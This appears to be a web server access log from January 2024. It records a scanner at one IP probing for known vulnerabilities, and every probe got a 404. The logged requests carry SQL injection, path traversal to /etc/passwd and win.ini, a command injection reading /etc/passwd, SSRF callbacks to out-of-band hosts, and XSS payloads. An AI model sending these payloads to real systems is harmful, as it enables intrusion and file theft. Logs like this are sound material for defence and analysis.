137.220.197.141 - - [21/Jan/2024:01:40:34 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:34 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:36 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:38 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:45 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:48 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:53 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsogtaxwkgh7ec5fz.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:57 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:58 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:58 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:00 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:09 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:22 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:39 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:41 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:43 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:45 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:47 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:49 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:41:49 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:00 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:12 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:24 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:24 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:26 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:27 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:38 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:38 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:49 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:51 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:42:51 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:43:25 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:43:32 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:44:10 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:44:12 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:44:31 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsogbd3c3gqi5h79r.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:45:02 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:45:12 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:45:21 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:45:34 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:45:47 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:45:58 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:45:58 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:46:01 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:46:21 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:46:22 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:46:28 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsog5gbzwoonudmk9.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:46:30 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:46:41 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsogoecuq87iwajzh.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:46:58 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:47:00 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:47:19 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:47:21 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:47:25 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:47:43 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:47:45 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:47:50 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:48:32 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:48:34 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:50:02 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:50:27 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:50:29 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:50:48 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:51:18 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:51:20 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:52:00 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:52:13 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:52:14 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:53:04 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:53:19 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:53:54 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:53:56 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:54:29 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:54:43 +0100] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:55:30 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:55:32 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:56:14 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:56:16 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:58:19 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:58:21 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
205.210.31.169 - - [21/Jan/2024:01:59:03 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:59:29 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:59:31 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:59:33 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:59:35 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:59:37 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:59:39 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:00:11 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:00:13 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:01:44 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:01:46 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:02:07 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:02:09 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:02:34 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:02:36 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:03:34 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:03:36 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:04:05 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:04:07 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:04:09 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:04:12 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:04:13 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:04:15 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:04:44 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:04:46 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:05:12 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:05:14 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:05:15 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:06:12 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:06:14 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:06:16 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:06:18 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:06:20 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:06:22 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:06:52 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:07:03 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:07:16 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:07:26 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:07:28 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:07:51 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:07:53 +0100] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 404 952
